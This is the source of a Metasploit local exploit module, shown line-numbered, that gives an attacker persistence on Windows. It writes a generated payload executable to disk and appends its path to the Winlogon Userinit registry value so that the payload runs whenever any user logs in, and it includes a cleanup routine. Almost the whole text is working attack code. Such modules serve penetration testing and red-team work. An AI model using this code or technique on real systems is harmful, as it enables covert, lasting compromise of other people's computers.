1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::Windows::Registry
10
  include Msf::Post::File
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::Powershell
13
  include Msf::Exploit::Local::Persistence
14
  prepend Msf::Exploit::Remote::AutoCheck
15

16
  def initialize(info = {})
17
    super(
18
      update_info(
19
        info,
20
        'Name' => 'Windows Registry Persistence via Userinit',
21
        'Description' => %q{
22
          This module will install a payload that is executed during user logon.
23
          It writes a payload executable to disk and modifies the Userinit registry value
24
          in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the
25
          payload path, causing it to execute when any user logs in.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'joel @ ndepthsecurity',
30
          'h00die',
31
        ],
32
        'Platform' => [ 'win' ],
33
        'Arch' => [ARCH_X86, ARCH_X64],
34
        'SessionTypes' => [ 'meterpreter', 'shell' ],
35
        'Targets' => [
36
          [ 'Automatic', {} ]
37
        ],
38
        'References' => [
39
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
40
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
41
        ],
42
        'DefaultTarget' => 0,
43
        'DisclosureDate' => '2015-07-01',
44
        'Notes' => {
45
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
46
          'Stability' => [CRASH_SAFE],
47
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
48
        }
49
      )
50
    )
51

52
    register_options([
53
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
54
    ])
55
  end
56

57
  def regkey
58
    'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
59
  end
60

61
  def writable_dir
62
    d = super
63
    return session.sys.config.getenv(d) if d.start_with?('%')
64

65
    d
66
  end
67

68
  def check
69
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
70
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
71

72
    return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey, 'Userinit').nil?
73

74
    Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
75
  end
76

77
  def install_persistence
78
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
79
    payload_exe = generate_payload_exe
80
    payload_pathname = writable_dir + '\\' + payload_name + '.exe'
81
    vprint_good("Writing payload to #{payload_pathname}")
82
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
83

84
    old_value = registry_getvaldata(regkey, 'Userinit')
85
    new_value = (old_value.split(',') + [payload_pathname]).join(',')
86
    vprint_status("Updating '#{old_value}' to '#{new_value}'")
87
    registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
88
    escaped_old_value = old_value.gsub('\\', '\\\\')
89
    @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
90
    @clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
91
  end
92
end
93

94